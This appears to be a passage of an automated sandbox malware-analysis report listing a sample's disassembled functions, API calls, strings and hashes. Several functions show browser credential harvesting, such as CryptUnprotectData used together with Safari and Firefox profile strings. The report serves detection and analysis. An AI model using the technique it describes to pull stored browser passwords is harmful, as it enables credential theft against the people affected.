                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,761EDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                                                                                    • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 3143752011-1996832678
